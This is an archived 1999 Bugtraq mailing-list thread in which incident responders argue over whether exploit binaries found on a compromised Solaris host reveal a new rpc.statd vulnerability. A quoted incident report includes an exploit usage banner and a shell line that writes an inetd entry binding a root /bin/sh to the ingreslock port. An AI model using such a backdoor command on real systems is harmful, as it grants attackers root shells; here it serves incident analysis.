Bugtraq mailing list archives

Re: Vulnerability in Solaris 2.6. rpc.statd ?

From: mb () APOLLO GTI NET (mb)
Date: Sat, 28 Aug 1999 15:00:27 -0400


I've seen these exploits multiple times while doing incident response.
The 'amexp' and 'statd' exploits are exploits for automountd.  The
nlockmgr exploit is broken code from someone who apparently didn't
understand buffer overflows or RPC very well.  The command line arguments
are the only things that are identical, other than the fact that both are
RPC exploits.  You cannot conclude that two exploits are identical only
because they both execute, say, '/bin/sh -i.'  The program being executed
usually has nothing to do with the nature of the hole.

I agree with Mr. Wells.  To post to a public mailing list with wild claims
of having found new exploits, on a machine hacked by kids who know
probably even less than you do, is stupid.  If you had a clue, you
would've disassembled these binaries and examined the network traffic
they generated while testing them on safe machines, before going off
making posts about known holes or holes that you decide exist on the basis
of finding a broken exploit.

past, I'd have to say that any company hiring you to secure their machines
has been seriously misled and cheated.  You seem to have little understanding
and knowledge of UNIX and/or UNIX security.

As a result of your ignorance, a lot of already harried administrators
were unnecessarily made paranoid.  Next time, look before you leap.

.mb

On Tue, 24 Aug 1999, Bob Todd wrote:

I found two binary-only exploits on a hacked machine.  The one of most
interest was "amexp" which when executed without arguments presents
the following:

    Usage: ./amexp address cache command type [port]

    Further help:

        address    -    system address
        cache      -    system hostname
        command    -    execute this command
        type       -    0: Solaris 2.5.1 stock,
                            1: Solaris 2.5.1 patched, 2.6 & 2.7
        port       -    optional port to bypass portmapper

A shell script that was included was "go.amexp" which contained:

./amexp $1 $2 "echo 'ingreslock stream tcp nowait root /bin/sh sh' >
/tmp/.xp;/usr/sbin/inetd -s /tmp/.xp" $3

The command is nearly identical to what is used for both tooltalk and
rpc.cmsd attacks

The proper patches were installed and I do not believe that it is the
statd/automountd exploit since
no indirect rpc services execution was attempted.

This incident is closed.



----- Original Message -----
From: Tabor J . Wells <twells () shore net>
To: Bob Todd <todd () home arc com>
Cc: <BUGTRAQ () securityfocus com>
Sent: Tuesday, August 24, 1999 1:52 PM
Subject: Re: Vulnerability in Solaris 2.6. rpc.statd ?

On Sat, Aug 21, 1999 at 12:31:18PM -0400,
Bob Todd <toddr () ARC COM> is thought to have said:

While performing an on-site incident response at
_______, I found several
Solaris-oriented exploit programs including a
statd2.6 (others were calendar
manager, tooltalk, and lockd?).  Since there is an
exploit program for statd on
 Solaris 2.6, I could conclude that Solaris 2.6
statd is vulnerable to attack.  I
have not tried the exploit, but since the machine
was probably compromised
by one of these programs, the threat seems real!!


And did this server have the statd patch installed (106592-02 on

sparc and

106593-02 on x86)? Did it have the various security patches for the

other

services mention installed as well?

Perhaps the program was part of the exploit which allowed indirect

RPC

calls with statd that was discussed here (and elsewhere) several

weeks

back.

I don't think your conclusion is supported given the information you
provided. Perhaps you could provide more information about the

exploit

before rushing to claim that there is a new vulnerability.

Tabor

--

______________________________________________________________________
__

Tabor J. Wells

twells () smarterliving com

Technology Manager

http://www.smarterliving.com

Smarter Living, Inc.                    It's your time. It's your

money.

Current thread:

[RHSA-1999:029-01] Denial of service attack in in.telnetd, (continued)
- - - [RHSA-1999:029-01] Denial of service attack in in.telnetd Bill Nottingham (Aug 19)
    - Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Olaf Kirch (Aug 19)
    - Insecure use of file in /tmp by trn Martin Schulze (Aug 19)
    - Winamp SHOUTcast server: Gain Administrator Password Michael (Aug 20)
    - Re: Insecure use of file in /tmp by trn Rogier Wolff (Aug 21)
    - IE 5.0 allows executing programs Georgi Guninski (Aug 21)
    - Re: IE 5.0 allows executing programs David LeBlanc (Aug 23)
    - Re: IE 5.0 allows executing programs Jesper M. Johansson (Aug 28)
    - Vulnerability in Solaris 2.6. rpc.statd ? Bob Todd (Aug 21)
    - Re: Vulnerability in Solaris 2.6. rpc.statd ? Bob Todd (Aug 24)
    - Re: Vulnerability in Solaris 2.6. rpc.statd ? mb (Aug 28)
    - Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Martin Schulze (Aug 19)
    - Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Aaron Campbell (Aug 19)
    - Microsoft Security Bulletin (MS99-030) Aleph One (Aug 20)
    - Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Alan Cox (Aug 22)
    - libtermcap exploit fix ... smashcap.c Hudin Lucian (Aug 22)
    - Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Pavel Kankovsky (Aug 26)
    - OCE' 9400 plotters Larry W. Cashdollar (Aug 19)
    - Re: OCE' 9400 plotters Patrick Cantwell (Aug 23)
    - Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Tymm Twillman (Aug 19)
    - Re: [RHSA-1999:028-01] Buffer overflow in libtermcap tgetent() Olaf Kirch (Aug 18)

(Thread continues...)